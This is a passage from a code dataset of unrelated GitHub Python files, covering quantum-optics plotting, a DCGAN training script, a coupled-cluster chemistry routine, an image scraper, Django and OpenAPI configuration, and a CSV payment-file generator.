'coincidence_rate'))\n plt.close()\n\n\ndef tomography_matrix_plots(\n results_dir,\n tomography_matrix,\n projection_tomography_matrix,\n Signal,\n Idler,\n):\n\n # tomography_matrix = unwrap_kron(tomography_matrix,\n # projection_tomography_matrix.projection_n_state1,\n # projection_tomography_matrix.projection_n_state2)\n\n tomography_matrix = tomography_matrix[0, :].\\\n reshape(projection_tomography_matrix.projection_n_state2, projection_tomography_matrix.projection_n_state2)\n\n # Compute and plot reduced tomography_matrix\n g1_ss_normalization = G1_Normalization(Signal.w)\n 
g1_ii_normalization = G1_Normalization(Idler.w)\n\n tomography_matrix_reduced = tomography_matrix * \\\n projection_tomography_matrix.tau / (g1_ii_normalization * g1_ss_normalization)\n\n # plot tomography_matrix 2d\n plt.imshow(tomography_matrix_reduced)\n plt.xlabel(r'signal mode i')\n plt.ylabel(r'idle mode j')\n plt.colorbar()\n\n plt.savefig(os.path.join(results_dir, 'tomography_matrix'))\n plt.close()\n\n\ndef density_matrix_plots(\n results_dir,\n density_matrix,\n):\n\n density_matrix_real = onp.real(density_matrix)\n density_matrix_imag = onp.imag(density_matrix)\n\n plt.imshow(density_matrix_real)\n plt.xlabel(r'signal mode i')\n plt.ylabel(r'idle mode j')\n plt.colorbar()\n plt.savefig(os.path.join(results_dir, 'density_matrix_real'))\n plt.close()\n\n plt.imshow(density_matrix_imag)\n plt.xlabel(r'signal mode i')\n plt.ylabel(r'idle mode j')\n plt.colorbar()\n plt.savefig(os.path.join(results_dir, 'density_matrix_imag'))\n plt.close()\n\n\ndef type_coeffs_to_txt(\n basis,\n max_mode1,\n max_mode2,\n coeffs_real,\n coeffs_imag,\n waists):\n sign = {'1.0': '+', '-1.0': '-', '0.0': '+'}\n print_str = f'basis: {basis}({max_mode1},{max_mode2}):\\n'\n for _real, _imag, _waist in zip(coeffs_real, coeffs_imag, waists):\n sign_imag = sign[str(onp.sign(_imag).item())]\n print_str += '{:.4} {} j{:.4} (waist: {:.4}[um])\\n'.format(_real, sign_imag, onp.abs(_imag), _waist * 10)\n return print_str\n\n\ndef unwrap_kron(G, M1, M2):\n '''\n the function takes a Kronicker product of size M1^2 x M2^2 and turns is into an\n M1 x M2 x M1 x M2 tensor. It is used only for illustration and not during the learning\n Parameters\n ----------\n G: the tensor we wish to reshape\n M1: first dimension\n M2: second dimension\n\n Returns a reshaped tensor with shape (M1, M2, M1, M2)\n -------\n\n '''\n\n C = onp.zeros((M1, M2, M1, M2), dtype=onp.float32)\n\n for i in range(M1):\n for j in range(M2):\n for k in range(M1):\n for l in range(M2):\n C[i, j, k, l] = G[k + M1 * i, l + M2 * j]\n return C\n","repo_name":"EyalRozenberg1/SPDCinv","sub_path":"src/spdc_inv/experiments/results_and_stats_utils.py","file_name":"results_and_stats_utils.py","file_ext":"py","file_size_in_byte":9373,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"41"} +{"seq_id":"39914013914","text":"from edc_consent.constants import DEFAULT_CONSENT_GROUP\n\nfrom .subject_consent import SubjectConsent\n\n\nclass SubjectConsentUg(SubjectConsent):\n class Meta(SubjectConsent.Meta):\n proxy = True\n verbose_name = \"Subject Consent (Uganda)\"\n verbose_name_plural = \"Subject Consents (Uganda)\"\n consent_group = DEFAULT_CONSENT_GROUP\n","repo_name":"intecomm-trial/intecomm-edc","sub_path":"intecomm_consent/models/subject_consent_ug.py","file_name":"subject_consent_ug.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"11808649041","text":"\n# coding: utf-8\n\n# # Project\n\n# In[1]:\n\nimport glob, os, time, random\nimport tensorflow as tf\nimport tensorlayer as tl\nimport numpy as np\n#from tqdm import tqdm\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom skimage import io\n# from pylab import rcParams\n# rcParams['figure.figsize'] = 10, 7\n\n\n## create folders\nsave_dir = \"samples\"\ncheckpoint_dir = \"checkpoint\"\ntl.files.exists_or_mkdir(save_dir)\ntl.files.exists_or_mkdir(checkpoint_dir)\n\n#labels = mnist.train.labels\nbatch_size = 128\n\ndef load_dir(path):\n 
images = []\n for fname in glob.glob(path):\n try:\n image = io.imread(fname).astype(np.float32)\n if len(image.shape) <= 2:\n image = np.swapaxes(np.stack((image,)*3), 0, 2)\n image = tl.prepro.imresize(image, size=[64, 64], interp='bicubic', mode=None)\n image = np.asarray(image, dtype=np.float32)\n images.append((np.array(image) / 127.5)-1)\n except Exception as e:\n print(fname, e)\n return np.array(images)\n\nspoons = load_dir('leaves_spoons/spoons/*')\nleaves = load_dir('leaves_spoons/leaves/*')\n\nprint(leaves.shape, spoons.shape)\n\n\n\ndef xavier_initializer(shape):\n return tf.random_normal(shape=shape, stddev=1/shape[0])\n\nimg_size = 64\ncolors = 3\n\n# Generator\nz_size = 200 # Latent vector dimension\ng_w1_size = 400\ng_w2_size = 200\ng_out_size = img_size * img_size * colors\n\n# Discriminator\nx_size = img_size * img_size * colors\nd_w1_size = 400\nd_w2_size = 200\nd_out_size = colors\n\n\nz = tf.placeholder('float', shape=(None, z_size))\nX = tf.placeholder('float', shape=(None, x_size))\n\n\n# ## Weights\n\n# In[7]:\n\ng_weights = {\n 'w1': tf.Variable(xavier_initializer(shape=(z_size, g_w1_size))),\n 'b1': tf.Variable(tf.zeros(shape=[g_w1_size])),\n 'w2': tf.Variable(xavier_initializer(shape=(g_w1_size, g_w2_size))),\n 'b2': tf.Variable(tf.zeros(shape=[g_w2_size])),\n 'out': tf.Variable(xavier_initializer(shape=(g_w2_size, g_out_size))),\n 'b3': tf.Variable(tf.zeros(shape=[g_out_size])),\n}\n\nd1_weights ={\n 'w1': tf.Variable(xavier_initializer(shape=(x_size, d_w1_size))),\n 'b1': tf.Variable(tf.zeros(shape=[d_w1_size])),\n 'w2': tf.Variable(xavier_initializer(shape=(d_w1_size, d_w2_size))),\n 'b2': tf.Variable(tf.zeros(shape=[d_w2_size])),\n 'out': tf.Variable(xavier_initializer(shape=(d_w2_size, d_out_size))),\n 'b3': tf.Variable(tf.zeros(shape=[d_out_size])),\n}\n\nd2_weights ={\n 'w1': tf.Variable(xavier_initializer(shape=(x_size, d_w1_size))),\n 'b1': tf.Variable(tf.zeros(shape=[d_w1_size])),\n 'w2': tf.Variable(xavier_initializer(shape=(d_w1_size, d_w2_size))),\n 'b2': tf.Variable(tf.zeros(shape=[d_w2_size])),\n 'out': tf.Variable(xavier_initializer(shape=(d_w2_size, d_out_size))),\n 'b3': tf.Variable(tf.zeros(shape=[d_out_size])),\n}\n\n\n# ## Models\n#\n# ### Layers\n\n# In[8]:\n\ndef conv(x, out_channels, kernel_size=5, stride=2, name='project'):\n with tf.variable_scope(name):\n x_shape = x.get_shape().as_list()\n kernel = tf.get_variable('conv_kernel', [kernel_size, kernel_size, x_shape[-1], out_channels],\n initializer=tf.truncated_normal_initializer(stddev=0.02))\n bias = tf.get_variable('conv_bias', [out_channels], initializer=tf.ones_initializer())\n\n return tf.nn.conv2d(x, kernel, [1, stride, stride, 1], padding='SAME') + bias\n\ndef deconv(x, out_channels, kernel_size=5, stride=2, name='project'):\n with tf.variable_scope(name):\n x_shape = x.get_shape().as_list()\n kernel = tf.get_variable('deconv_kernel', [kernel_size, kernel_size, out_channels, x_shape[-1]],\n initializer=tf.truncated_normal_initializer(stddev=0.02))\n bias = tf.get_variable('deconv_bias', [out_channels], initializer=tf.ones_initializer())\n output_shape = [batch_size, x_shape[1] * stride, x_shape[2] * stride, out_channels]\n\n return tf.nn.conv2d_transpose(x, kernel, output_shape, [1, stride, stride, 1]) + bias\n\ndef dense(x, out_channels, name='project'):\n with tf.variable_scope(name):\n x_shape = x.get_shape().as_list()\n W = tf.get_variable('dense_w', [x_shape[1], out_channels],\n initializer=tf.truncated_normal_initializer(stddev=0.02))\n bias = tf.get_variable('dense_bias', 
[out_channels], initializer=tf.ones_initializer())\n return tf.matmul(x, W) + bias\n\ndef lrelu(x, leak=0.2):\n return tf.maximum(x, leak*x)\n\ndef bn(x, name='project'):\n with tf.variable_scope(name):\n x_shape = x.get_shape().as_list()\n beta = tf.get_variable('BnBeta', [x_shape[-1]],\n initializer=tf.zeros_initializer())\n gamma = tf.get_variable('BnGamma', [x_shape[-1]],\n initializer=tf.ones_initializer())\n mean, var = tf.nn.moments(x, [0])\n return tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-5)\n\n\n# In[9]:\n\n\ndef G(z, reuse=True):\n with tf.variable_scope('G', reuse=reuse):\n g_h1 = dense(z, out_channels=1024, name='h1')\n g_h1 = bn(g_h1, name='bn1')\n g_h1 = tf.nn.relu(g_h1)\n g_h2 = dense(g_h1, out_channels=int(img_size/4)*int(img_size/4)*128, name='h2')\n g_h2 = bn(g_h2, name='bn2')\n g_h2 = tf.nn.relu(g_h2)\n g_h3 = tf.reshape(g_h2, [-1, int(img_size/4), int(img_size/4), 128])\n g_h3 = deconv(g_h3, out_channels=64, name='h3')\n g_h3 = bn(g_h3, name='bn3')\n g_h3 = tf.nn.relu(g_h3)\n g_h4 = deconv(g_h3, out_channels=colors, name='h4')\n # g_h4 = tf.reshape(g_h4, [-1, img_size * img_size, colors])\n return tf.nn.tanh(g_h4)\n\ndef D1(x, reuse=True):\n with tf.variable_scope('D1', reuse=reuse):\n x = tf.reshape(x, [-1, img_size, img_size, colors])\n #x = bn(x, name='bn1')\n d1_h1 = conv(x, out_channels=64, name='h1')\n #d1_h1 = bn(d1_h1, name='bn2')\n d1_h1 = lrelu(d1_h1)\n d1_h2 = conv(d1_h1, out_channels=128, name='h2')\n #d1_h2 = bn(d1_h2, name='bn3')\n d1_h2 = lrelu(d1_h2)\n d1_h2 = tl.layers.flatten_reshape(d1_h2, name='f')\n # d1_h2 = tf.reshape(d1_h2, [-1, 128])\n # d1_h3 = tf.nn.dropout(d1_h2, 0.5)\n d1_h3 = dense(d1_h2, out_channels=colors, name='h3')\n return d1_h3\n\ndef D2(x, reuse=True):\n with tf.variable_scope('D2', reuse=reuse):\n x = tf.reshape(x, [-1, img_size, img_size, colors])\n x = tf.image.rgb_to_grayscale(x)\n #x = bn(x, name='bn1')\n d2_h1 = conv(x, out_channels=64, name='h1')\n #d2_h1 = bn(d2_h1, name='bn2')\n d2_h1 = lrelu(d2_h1)\n d2_h2 = conv(d2_h1, out_channels=128, name='h2')\n #d2_h2 = bn(d2_h2, name='bn3')\n d2_h2 = lrelu(d2_h2)\n d2_h2 = tf.reshape(d2_h2, [-1, 128])\n # d2_h3 = tf.nn.dropout(d2_h2, 0.5)\n d2_h2 = tl.layers.flatten_reshape(d2_h2, name='f')\n d2_h3 = dense(d2_h2, out_channels=colors, name='h3')\n return d2_h3\n\ndef generate_z(n=1):\n return np.random.normal(scale=0.1, size=(n, z_size))\n\n\nG(z, reuse=False)\nD1(spoons[0], reuse=False)\nD2(spoons[0], reuse=False)\n\nsample = G(z) # To be called during session\n\n\ndef x_entropy(x, y):\n return tf.nn.sigmoid_cross_entropy_with_logits(logits=x, labels=y)\n\n\nd1_real = D1(X)\nd1_fake = D1(G(z))\nd2_real = D2(X)\nd2_fake = D2(G(z))\n\nG1_objective = tf.reduce_mean(x_entropy(d1_fake, tf.ones_like(d1_fake)))\nG2_objective = tf.reduce_mean(x_entropy(d2_fake, tf.ones_like(d2_fake)))\n\nD1_obj_real = tf.reduce_mean(x_entropy(d1_real, tf.ones_like(d1_real)-0.1))\nD1_obj_fake = tf.reduce_mean(x_entropy(d1_fake, tf.zeros_like(d1_fake)))\nD1_objective = D1_obj_real + D1_obj_fake\n\nD2_obj_real = tf.reduce_mean(x_entropy(d2_real, tf.ones_like(d2_real)-0.1))\nD2_obj_fake = tf.reduce_mean(x_entropy(d2_fake, tf.zeros_like(d2_fake)))\nD2_objective = D2_obj_real + D2_obj_fake\n\nD1_fake_balance = tf.reduce_mean((x_entropy(d1_fake, tf.zeros_like(d1_fake)) -\n x_entropy(d1_fake, tf.ones_like(d1_fake)))**2)\nD2_fake_balance = tf.reduce_mean((x_entropy(d2_fake, tf.zeros_like(d2_fake)) -\n x_entropy(d2_fake, tf.ones_like(d2_fake)))**2)\n\n\nparams = tf.trainable_variables()\nd1_params = [v 
for v in params if v.name.startswith('D1/')]\nd2_params = [v for v in params if v.name.startswith('D2/')]\ng_params = [v for v in params if v.name.startswith('G/')]\n\n\nG1_opt = tf.train.AdamOptimizer().minimize(\n G1_objective, var_list=g_params)\nG2_opt = tf.train.AdamOptimizer().minimize(\n G2_objective, var_list=g_params)\n\nD1_real_opt = tf.train.AdamOptimizer().minimize(\n D1_obj_real, var_list=d1_params)\nD2_real_opt = tf.train.AdamOptimizer().minimize(\n D2_obj_real, var_list=d2_params)\nD1_fake_opt = tf.train.AdamOptimizer().minimize(\n D1_obj_fake, var_list=d1_params)\nD2_fake_opt = tf.train.AdamOptimizer().minimize(\n D2_obj_fake, var_list=d2_params)\n\n# D1_balance_opt = tf.train.AdamOptimizer().minimize(\n# D1_fake_balance, var_list=d1_params)\n# D2_balance_opt = tf.train.AdamOptimizer().minimize(\n# D2_fake_balance, var_list=d2_params)\n\nD1_opt = tf.train.AdamOptimizer().minimize(\n D1_objective, var_list=d1_params)\nD2_opt = tf.train.AdamOptimizer().minimize(\n D2_objective, var_list=d2_params)\n\n\n# ## Training\n\n# Hyper-parameters\n# import random\n# import warnings\n# import matplotlib.gridspec as gridspec\n# from IPython.display import clear_output\n# warnings.simplefilter('error', UserWarning)\n\nn_step = 500000\nimages1 = leaves\nimages2 = spoons\n\nwith tf.Session(config=tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)) as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(n_step):\n\n _, errDA = sess.run([D1_opt, D1_objective], feed_dict={\n X: images1[np.random.choice(range(len(images1)), batch_size)].reshape(batch_size, img_size * img_size * colors),\n z: generate_z(batch_size),\n })\n _, errDB = sess.run([D2_opt, D2_objective], feed_dict={\n X: images2[np.random.choice(range(len(images2)), batch_size)].reshape(batch_size, img_size * img_size * colors),\n z: generate_z(batch_size),\n })\n\n # G\n _, errGA = sess.run([G1_opt, G1_objective], feed_dict={\n z: generate_z(batch_size)\n })\n\n _, errGB = sess.run([G2_opt, G2_objective], feed_dict={\n z: generate_z(batch_size)\n })\n\n print(\"Step: [%2d/%2d] dA:%.5f dB:%.5f gA:%.5f gB:%.5f\" % (i, n_step, errDA, errDB, errGA, errGB))\n if (i % 200 ==0):#((i / epochs) % 0.01 == 0):\n print(i, costs[i])\n images = sess.run(sample, feed_dict={z:generate_z(batch_size)})\n tl.vis.save_images(images[0:32], [4, 8], save_dir+'/%d_test.png' % i)\n","repo_name":"tsing90/DesignGan","sub_path":"dcgan-custom-rgb-working2.py","file_name":"dcgan-custom-rgb-working2.py","file_ext":"py","file_size_in_byte":10601,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"41"} +{"seq_id":"33407826503","text":"\ndef get_model(model_type):\n if model_type.lower() == \"deeplabv3p\":\n from src.deeplab.networks import DeepLabV3pXc\n return DeepLabV3pXc\n elif model_type.lower() == \"unet\":\n from src.unet.networks import UNet\n return UNet\n elif model_type.lower() in [\"attentionunet\", \"attunet\"]:\n from src.unet.networks import AttentionUNet\n return AttentionUNet\n","repo_name":"SSinyu/Brain-Segmentation","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"41"} +{"seq_id":"2341578792","text":"#!/usr/bin/env python3\nimport math\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"ANGLE\", help=\"The angle at which the projectale was fired\", type=float)\nparser.add_argument(\"SPEED\", help=\"The speed at 
which the projectale was fired\", type=float)\nparser.add_argument(\"-g\", help=\"Gravitational accelration spped in. Default is 9.8067 m/s^2\", default=9.8067, type=float)\nparser.add_argument(\"-y\", help=\"The starting height of the projectale in meters. Default is 0\",default=0, type=float)\nargs = parser.parse_args()\n\ndef projectleMotion(o: float, v: float, g: float = 9.8067, y: float = 0) -> tuple:\n \"\"\" Calculating ballistic curve based on:\n o - the angle at which the projectale was fired \n v - the speed at which the projectale was fired\n g - gravitational accelration spped in m/s^2\n y - starting height of the projectale\n \n Returned data is a tuple in format = (y, d) where\n d - distance traveled by projectale \n t - time at which projectale traveled d distance\n \"\"\"\n # Calculating distance traveled by projectale\n if o == 45 and y == 0:\n d = (v**2)/g\n elif y == 0:\n d = ((v**2) * math.sin(2*o)) / g\n else:\n d = (v * math.cos(o))/g\n d *= (v * math.sin(o) + math.sqrt((v * math.sin(o))**2 + (2*g*y)))\n\n # Calculating time at which projectale traveled d distance\n if o == 45 and y == 0:\n t = (math.sqrt(2) * v)/g\n else:\n t = d / (v * math.cos(o))\n \n return (d, t)\n\n\nif __name__ == '__main__':\n x,t = projectleMotion(args.ANGLE, args.SPEED, args.g, args.y) \n print(f'Traveled distance: {round(x,2)}m\\nTime of traveled distance: {round(t,2)}s')","repo_name":"k1k9/projectle-montion","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"32325515761","text":"#!/usr/bin/env python\n#\n# Author: Qiming Sun \n#\n\nimport time\nimport numpy\nfrom pyscf import lib\nfrom pyscf.lib import logger\nfrom pyscf.cc import _ccsd\n\n'''\nCCSD(T)\n'''\n\n# t3 as ijkabc\n\n# JCP, 94, 442. 
Error in Eq (1), should be [ia] >= [jb] >= [kc]\ndef kernel(mycc, eris, t1=None, t2=None, verbose=logger.NOTE):\n if isinstance(verbose, logger.Logger):\n log = verbose\n else:\n log = logger.Logger(mycc.stdout, verbose)\n\n if t1 is None: t1 = mycc.t1\n if t2 is None: t2 = mycc.t2\n\n t1T = t1.T\n t2T = t2.transpose(2,3,0,1)\n\n nocc, nvir = t1.shape\n nmo = nocc + nvir\n e_occ, e_vir = mycc._scf.mo_energy[:nocc], mycc._scf.mo_energy[nocc:]\n eijk = lib.direct_sum('i,j,k->ijk', e_occ, e_occ, e_occ)\n\n eris_ovvv = lib.unpack_tril(eris.ovvv.reshape(nocc*nvir,-1))\n eris_vvov = eris_ovvv.reshape(nocc,nvir,nvir,nvir).transpose(1,2,0,3)\n eris_vooo = eris.ovoo.transpose(1,0,2,3)\n eris_vvoo = eris.ovov.transpose(1,3,0,2)\n def get_w(a, b, c):\n w = numpy.einsum('if,fkj->ijk', eris_vvov[a,b], t2T[c,:])\n w-= numpy.einsum('ijm,mk->ijk', eris_vooo[a,:], t2T[b,c])\n return w\n def get_v(a, b, c):\n return numpy.einsum('ij,k->ijk', eris_vvoo[a,b], t1T[c])\n\n et = 0\n for a in range(nvir):\n for b in range(a+1):\n for c in range(b+1):\n d3 = eijk - e_vir[a] - e_vir[b] - e_vir[c]\n if a == c: # a == b == c\n d3 *= 6\n elif a == b or b == c:\n d3 *= 2\n\n wabc = get_w(a, b, c)\n wacb = get_w(a, c, b)\n wbac = get_w(b, a, c)\n wbca = get_w(b, c, a)\n wcab = get_w(c, a, b)\n wcba = get_w(c, b, a)\n vabc = get_v(a, b, c)\n vacb = get_v(a, c, b)\n vbac = get_v(b, a, c)\n vbca = get_v(b, c, a)\n vcab = get_v(c, a, b)\n vcba = get_v(c, b, a)\n zabc = r3(wabc + .5 * vabc) / d3\n zacb = r3(wacb + .5 * vacb) / d3\n zbac = r3(wbac + .5 * vbac) / d3\n zbca = r3(wbca + .5 * vbca) / d3\n zcab = r3(wcab + .5 * vcab) / d3\n zcba = r3(wcba + .5 * vcba) / d3\n\n et+= numpy.einsum('ijk,ijk', wabc, zabc)\n et+= numpy.einsum('ikj,ijk', wacb, zabc)\n et+= numpy.einsum('jik,ijk', wbac, zabc)\n et+= numpy.einsum('jki,ijk', wbca, zabc)\n et+= numpy.einsum('kij,ijk', wcab, zabc)\n et+= numpy.einsum('kji,ijk', wcba, zabc)\n\n et+= numpy.einsum('ijk,ijk', wacb, zacb)\n et+= numpy.einsum('ikj,ijk', wabc, zacb)\n et+= numpy.einsum('jik,ijk', wcab, zacb)\n et+= numpy.einsum('jki,ijk', wcba, zacb)\n et+= numpy.einsum('kij,ijk', wbac, zacb)\n et+= numpy.einsum('kji,ijk', wbca, zacb)\n\n et+= numpy.einsum('ijk,ijk', wbac, zbac)\n et+= numpy.einsum('ikj,ijk', wbca, zbac)\n et+= numpy.einsum('jik,ijk', wabc, zbac)\n et+= numpy.einsum('jki,ijk', wacb, zbac)\n et+= numpy.einsum('kij,ijk', wcba, zbac)\n et+= numpy.einsum('kji,ijk', wcab, zbac)\n\n et+= numpy.einsum('ijk,ijk', wbca, zbca)\n et+= numpy.einsum('ikj,ijk', wbac, zbca)\n et+= numpy.einsum('jik,ijk', wcba, zbca)\n et+= numpy.einsum('jki,ijk', wcab, zbca)\n et+= numpy.einsum('kij,ijk', wabc, zbca)\n et+= numpy.einsum('kji,ijk', wacb, zbca)\n\n et+= numpy.einsum('ijk,ijk', wcab, zcab)\n et+= numpy.einsum('ikj,ijk', wcba, zcab)\n et+= numpy.einsum('jik,ijk', wacb, zcab)\n et+= numpy.einsum('jki,ijk', wabc, zcab)\n et+= numpy.einsum('kij,ijk', wbca, zcab)\n et+= numpy.einsum('kji,ijk', wbac, zcab)\n\n et+= numpy.einsum('ijk,ijk', wcba, zcba)\n et+= numpy.einsum('ikj,ijk', wcab, zcba)\n et+= numpy.einsum('jik,ijk', wbca, zcba)\n et+= numpy.einsum('jki,ijk', wbac, zcba)\n et+= numpy.einsum('kij,ijk', wacb, zcba)\n et+= numpy.einsum('kji,ijk', wabc, zcba)\n et *= 2\n log.info('CCSD(T) correction = %.15g', et)\n return et\n\ndef r3(w):\n return (4 * w + w.transpose(1,2,0) + w.transpose(2,0,1)\n - 2 * w.transpose(2,1,0) - 2 * w.transpose(0,2,1)\n - 2 * w.transpose(1,0,2))\n\n\nif __name__ == '__main__':\n from pyscf import gto\n from pyscf import scf\n from pyscf import cc\n\n mol = 
gto.M()\n numpy.random.seed(12)\n nocc, nvir = 5, 12\n eris = lambda :None\n eris.ovvv = numpy.random.random((nocc,nvir,nvir*(nvir+1)//2)) * .1\n eris.ovoo = numpy.random.random((nocc,nvir,nocc,nocc)) * .1\n eris.ovov = numpy.random.random((nocc,nvir,nocc,nvir)) * .1\n t1 = numpy.random.random((nocc,nvir)) * .1\n t2 = numpy.random.random((nocc,nocc,nvir,nvir)) * .1\n t2 = t2 + t2.transpose(1,0,3,2)\n mf = scf.RHF(mol)\n mcc = cc.CCSD(mf)\n mcc._scf.mo_energy = numpy.arange(nocc+nvir)\n print(kernel(mcc, eris, t1, t2) + 8.4953387936460398)\n\n mol = gto.Mole()\n mol.atom = [\n [8 , (0. , 0. , 0.)],\n [1 , (0. , -.957 , .587)],\n [1 , (0.2, .757 , .487)]]\n\n mol.basis = 'ccpvdz'\n mol.build()\n rhf = scf.RHF(mol)\n rhf.conv_tol = 1e-14\n rhf.scf()\n mcc = cc.CCSD(rhf)\n mcc.conv_tol = 1e-14\n mcc.ccsd()\n\n e3a = kernel(mcc, mcc.ao2mo())\n print(e3a - -0.0033300722698513989)\n\n","repo_name":"mibumi/pyscf","sub_path":"pyscf/cc/ccsd_t_slow.py","file_name":"ccsd_t_slow.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"41"} +{"seq_id":"3011310789","text":"from bs4 import BeautifulSoup, NavigableString, Tag\nfrom urllib.request import urlopen\nimport os\nimport datetime\nimport urllib.request\nimport contextlib\n\nbaseurl = 'http://www.keyakizaka46.com/s/k46o/search/artist?ima=0000'\nindex = urlopen(baseurl)\nhead = index.read()\nhsoup = BeautifulSoup(head, 'lxml')\nbox = hsoup.find('div', {'class':'sorted sort-constellation'})\nmembers = box.findAll('a')\nmemberpages = [line.attrs['href'] for line in members]\n\ndate = hsoup.find('li',{'class':'news'}).find('a').attrs['href'].rsplit('=', 1)[1]\ndir = '/Users/Bill/Desktop/LL/欅坂手書き/%s/' % date\nprint(dir)\ninput(\"Continue:\")\nif not os.path.exists(dir):\n os.makedirs(dir)\n\nwith open(os.path.join(dir, '%s_tekaki.txt' % date), 'w') as photolinktxt:\n for line in memberpages:\n link = 'http://www.keyakizaka46.com' + line\n\n with contextlib.closing(urlopen(link)) as handle:\n html = handle.read()\n soup = BeautifulSoup(html, 'lxml')\n\n name = soup.find('p',{'class':'name'}).get_text().strip()\n # name = name + '_手書き_' + date + '.jpg'\n\n imgsrc = soup.find('div',{'class':'box-msg'}).find('img')\n if imgsrc is None:\n print(link)\n continue\n tekaki = imgsrc.attrs['src']\n name = name + '_手書き_' + date + str(tekaki).split('/')[-1]\n imgpath = os.path.join(dir, name)\n urllib.request.urlretrieve(tekaki, imgpath)\n photolinktxt.write(str(tekaki) + '\\n')\nphotolinktxt.close()\n","repo_name":"WatanabeMiho/SakamichiOfficialBlogCrawler","sub_path":"tekaki.py","file_name":"tekaki.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"40673196297","text":"\"\"\"URL configuration for the OpenAPI documentation endpoints.\"\"\"\n\nfrom django.conf.urls import url\nfrom django.urls import reverse_lazy\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\nfrom rest_framework import permissions\n\nSchemaView = get_schema_view(\n openapi.Info(\n title=\"Don't Panic API!\",\n default_version='v1',\n description=\"A Pandemic Kitchen Inventory Manager\",\n terms_of_service=reverse_lazy('legal_tos'),\n contact=openapi.Contact(email=\"niall@niallbyrne.ca\"),\n license=openapi.License(name=\"MPL 2.0 License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n url(\n r'^swagger(?P\\.json|\\.yaml)$',\n 
SchemaView.without_ui(cache_timeout=0),\n name='schema-json'\n ),\n url(\n r'^swagger/$',\n SchemaView.with_ui('swagger', cache_timeout=0),\n name='schema-swagger-ui'\n ),\n]\n","repo_name":"grocerypanic/grocerypanic-backend","sub_path":"panic/root/urls/openapi.py","file_name":"openapi.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"70985499323","text":"import csv\nimport tempfile\nfrom typing import List\nfrom datetime import datetime as dt\nfrom io import StringIO\n# import hug\nfrom marshmallow import fields\nfrom . import models\nfrom . import sample\n\n# *source* refers to details with \"beneficiary\" at the beginning in template\n# *bank* refers to details with \"bank\" at the beginning in the template\n# instrument date is transfer.date\n# debit and credit reference format = JANUARY 2014 PAYMENT\n\n\ndef gen_instr(transfers: List[models.TransferDetails]):\n with open(\"test_data.csv\", \"w\", newline=\"\") as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(\n [\"H\", \"CORPORATE\", \"H2HPAY\",\n \"\", \"\", \"{:%d%m%Y}\".format(dt.now()), \"SALARYJAN2019\"]\n )\n for transfer in transfers:\n csvwriter.writerow(\n [\"D\", transfer.source.reference]\n + [\"\"] * 2\n + [transfer.source.bene_name]\n + [\"\"] * 3\n + [\n transfer.source.bank,\n transfer.source.branch,\n \"\", \"\",\n transfer.dest.country,\n transfer.source.debit_acc_number,\n transfer.source.currency,\n \"\",\n transfer.source.address,\n transfer.source.country,\n \"\",\n transfer.source.city,\n ]\n + [\"\"] * 22\n + [transfer.source.debit_acc_number, transfer.dest.currency]\n + [\"\"] * 3\n + [transfer.amount, \"\", transfer.activation_date, transfer.date]\n + [\"\"] * 9\n + [transfer.debit_reference,\n \"\",\n transfer.credit_reference]\n + [\"\"] * 7\n )\n csvwriter.writerow(\n [\"T\", len(transfers), sum(t.amount for t in transfers), \"\", \"\"]\n )\n csvwriter.writerow(\n [\"\", \"\", \"\", \"\", \"\"]\n )\n csvwriter.writerow(\n [\"\", \"\", \"\", \"\", \"\"]\n )\n csvwriter.writerow(\n [\"H\", \"CLIENT CODE\", \"H2HPAY\",\n \"\", \"\", \"Payment Date\", \"PIR Reference\"]\n )\n csvwriter.writerow(\n [\"D\", \"Instrument Reference\"]\n + [\"\"] * 2\n + [\"Name of Beneficiary\"]\n + [\"\"] * 3\n + [\n \"Beneficiary Bank\",\n \"Beneficiary Branch\",\n \"\", \"\",\n \"Bank Country\",\n \"Beneficiary Account Number\",\n \"Beneficiary Account Currency\",\n \"\",\n \"Beneficiary Address\",\n \"Beneficiary Country\",\n \"\",\n \"Beneficiary City\",\n ]\n + [\"\"] * 22\n + [\"Debit Account Number\", \"Payment Currency\"]\n + [\"\"] * 3\n + [\"Payment Amount\", \"\", \"Acctivation Date\", \"Instrument Date\"]\n + [\"\"] * 9\n + [\"Debit Reference\",\n \"\",\n \"Credit Reference\"]\n + [\"\"] * 7\n )\n csvwriter.writerow(\n [\"T\", len(transfers), sum(t.amount for t in transfers), \"\", \"\"]\n )\n\n\n# @hug.post(\"/transactiondetails\")\n# def transactiondetails(\n# transfers: hug.types.MarshmallowInputSchema(models.TransferDetailsSchema(many=True))\n# ) -> models.CSVResponse():\n\n# return {\"csv\": gen_instr([sample.TRANSFER])}\n","repo_name":"EnaSmoak/write_to_csv","sub_path":"omni/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"29688834337","text":"from django.db import models\nfrom django.core.validators import RegexValidator\nfrom django.utils.translation 
